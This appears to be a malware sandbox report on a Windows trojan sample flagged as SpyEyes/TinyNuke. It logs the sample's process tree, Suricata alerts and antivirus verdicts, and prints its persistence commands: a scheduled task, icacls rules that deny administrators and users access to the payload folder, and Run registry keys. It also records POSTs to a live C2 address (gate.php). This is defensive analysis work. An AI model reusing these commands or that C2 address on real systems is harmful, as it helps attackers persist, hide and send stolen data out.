Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 7, 2021, 7:01 p.m.	Sept. 7, 2021, 7:08 p.m.

Size	239.1KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`385eccb9e711368035f0f329f98255ec`
SHA256	`1e80bf1bca4a8841d973e8bf1f88e2d7cce3160793f23b2351db0aa7ea23af4e`
CRC32	`8EDC4B91`
ssdeep	`3072:zASUot4cIAg0Fuj7M1iUa2LQR/wkLsrA5vmUBmHHcTnoeYYHIwG1Opm92BuiFwdn:eLAORwAtmBHHc8eY5XOpwiFEHt1CB5O`
Yara	PE_Header_Zero - PE File Signature ASPack_Zero - ASPack packed file Malicious_Library_Zero - Malicious_Library IsPE32 - (no description) Win32_Trojan_Gen_2_0904B0_Zero - Win32 Trojan Gen OS_Processor_Check_Zero - OS Processor Check Malicious_Packer_Zero - Malicious Packer

hv.exe "C:\Users\test22\AppData\Local\Temp\hv.exe"
2416
- cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
  2276
  - schtasks.exe schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
    2668
- cmd.exe "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
  2664
  - icacls.exe icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
    2080
- cmd.exe "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
  2092
  - icacls.exe icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
    1204
- cmd.exe "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
  2704
  - icacls.exe icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
    1296
- cmd.exe "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
  2412
  - icacls.exe icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
    204
- cmd.exe "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
  2040
  - icacls.exe icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
    2988
- 5OEH.exe "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe"
  2232

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
37.49.230.185	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49215 -> 37.49.230.185:80	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 37.49.230.185:80	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 37.49.230.185:80	2022986	ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad	A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80	2022986	ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 37.49.230.185:80	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 37.49.230.185:80	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 37.49.230.185:80	2022986	ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad	A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80	2022986	ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad	A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80	2022986	ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 7, 2021, 7:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 7, 2021, 7:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 7, 2021, 7:03 p.m.	computer_name: TEST22-PC	1	1

Command line console output was observed (11 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 7, 2021, 7:01 p.m.	buffer: SUCCESS: The scheduled task "{5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR}" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 7, 2021, 7:01 p.m.	buffer: processed file: C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ} console_handle: 0x00000007	1	1
WriteConsoleW Sept. 7, 2021, 7:01 p.m.	buffer: Successfully processed 1 files; Failed processing 0 files console_handle: 0x00000007	1	1
WriteConsoleW Sept. 7, 2021, 7:01 p.m.	buffer: processed file: C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ} console_handle: 0x00000007	1	1
WriteConsoleW Sept. 7, 2021, 7:01 p.m.	buffer: Successfully processed 1 files; Failed processing 0 files console_handle: 0x00000007	1	1
WriteConsoleW Sept. 7, 2021, 7:01 p.m.	buffer: processed file: C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ} console_handle: 0x00000007	1	1
WriteConsoleW Sept. 7, 2021, 7:01 p.m.	buffer: Successfully processed 1 files; Failed processing 0 files console_handle: 0x00000007	1	1
WriteConsoleW Sept. 7, 2021, 7:01 p.m.	buffer: processed file: C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ} console_handle: 0x00000007	1	1
WriteConsoleW Sept. 7, 2021, 7:01 p.m.	buffer: Successfully processed 1 files; Failed processing 0 files console_handle: 0x00000007	1	1
WriteConsoleW Sept. 7, 2021, 7:01 p.m.	buffer: processed file: C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ} console_handle: 0x00000007	1	1
WriteConsoleW Sept. 7, 2021, 7:01 p.m.	buffer: Successfully processed 1 files; Failed processing 0 files console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 7, 2021, 7:01 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	code
section	data

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header, POST method with no useragent header, Connection to IP address

suspicious_request

POST http://37.49.230.185/bp/gate.php?017BD04FB3BF45B68167E

Performs some HTTP requests (1 event)

request

POST http://37.49.230.185/bp/gate.php?017BD04FB3BF45B68167E

Sends data using the HTTP POST Method (1 event)

request

POST http://37.49.230.185/bp/gate.php?017BD04FB3BF45B68167E

A process attempted to delay the analysis task. (1 event)

description

5OEH.exe tried to sleep 146 seconds, actually delayed analysis time by 146 seconds

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\7601.17514.amd64fre.win7sp1_rtm.101119-1850_x86Maria.dll

Creates a suspicious process (13 events)

cmdline	cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "S-1-1-0:(R,REA,RA,RD)" "S-1-5-7:(R,REA,RA,RD)"
cmdline	"C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
cmdline	cmd.exe /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline	cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
cmdline	"C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "S-1-1-0:(R,REA,RA,RD)" "S-1-5-7:(R,REA,RA,RD)"
cmdline	cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
cmdline	"C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
cmdline	schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline	cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline	"C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
cmdline	cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
cmdline	"C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"

A process created a hidden window (7 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 7, 2021, 7:01 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f filepath: cmd.exe	1	1
ShellExecuteExW Sept. 7, 2021, 7:01 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "S-1-1-0:(R,REA,RA,RD)" "S-1-5-7:(R,REA,RA,RD)" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 7, 2021, 7:01 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 7, 2021, 7:01 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 7, 2021, 7:01 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 7, 2021, 7:01 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 7, 2021, 7:01 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe parameters: filepath: C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe	1	1

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	cmd.exe /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline	schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f

Communicates with host for which no DNS query was performed (1 event)

host

37.49.230.185

Installs itself for autorun at Windows startup (5 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\{5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR}	reg_value	C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\{5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR}	reg_value	C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe
cmdline	cmd.exe /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline	schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f

Uses suspicious command line tools or Windows utilities (15 events)

cmdline	cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "S-1-1-0:(R,REA,RA,RD)" "S-1-5-7:(R,REA,RA,RD)"
cmdline	"C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
cmdline	cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
cmdline	"C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "S-1-1-0:(R,REA,RA,RD)" "S-1-5-7:(R,REA,RA,RD)"
cmdline	icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
cmdline	cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
cmdline	"C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
cmdline	cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
cmdline	"C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
cmdline	cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
cmdline	"C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
cmdline	icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "S-1-1-0:(R,REA,RA,RD)" "S-1-5-7:(R,REA,RA,RD)"
cmdline	icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
cmdline	icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
cmdline	icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"

Uses Sysinternals tools in order to add additional command line functionality (3 events)

cmdline	cmd.exe /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline	schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f

File has been identified by 49 AntiVirus engines on VirusTotal as malicious (49 events)

Bkav	W32.SpyEyesaND.Trojan
Lionic	Trojan.Win32.SpyEyes.l!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.37249392
FireEye	Generic.mg.385eccb9e7113680
McAfee	GenericRXMI-NY!385ECCB9E711
Cylance	Unsafe
VIPRE	Trojan.Win32.Generic!BT
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	TrojanSpy:Win32/SpyEyes.26aa6225
K7GW	Trojan ( 0054f5af1 )
K7AntiVirus	Trojan ( 0054f5af1 )
BitDefenderTheta	Gen:NN.ZexaF.34126.ou2@aaJWp7hi
Cyren	W32/Trojan.RTCJ-5872
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Agent.AARD
APEX	Malicious
Paloalto	generic.ml
ClamAV	Win.Malware.TinyNuke-9863711-1
Kaspersky	HEUR:Trojan-Spy.Win32.SpyEyes.gen
BitDefender	Trojan.GenericKD.37249392
Avast	Win32:Trojan-gen
Ad-Aware	Trojan.GenericKD.37249392
Sophos	Mal/Generic-S
Zillya	Trojan.SpyEyes.Win32.15359
TrendMicro	TROJ_GEN.R002C0PGB21
McAfee-GW-Edition	GenericRXMI-NY!385ECCB9E711
Emsisoft	Trojan.GenericKD.37249392 (B)
Ikarus	Trojan.Win32.Agent
Jiangmin	TrojanSpy.SpyEyes.ppa
Avira	TR/Agent.ouzrw
Antiy-AVL	Trojan/Generic.ASMalwS.33E8AE7
Gridinsoft	Trojan.Win32.Agent.vb
Microsoft	Trojan:Win32/Mamson.A!ac
ZoneAlarm	HEUR:Trojan-Spy.Win32.SpyEyes.gen
GData	Trojan.GenericKD.37249392
Cynet	Malicious (score: 99)
Acronis	suspicious
ALYac	Trojan.GenericKD.37249392
MAX	malware (ai score=81)
VBA32	BScope.Trojan.Fuerboos
Malwarebytes	Malware.AI.4123601789
TrendMicro-HouseCall	TROJ_GEN.R002C0PGB21
Yandex	Trojan.Agent!XUAvosWD/oY
SentinelOne	Static AI - Suspicious PE
eGambit	PE.Heur.InvalidSig
Fortinet	W32/Agent.AARD!tr
AVG	Win32:Trojan-gen
Panda	Trj/GdSda.A

hv.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All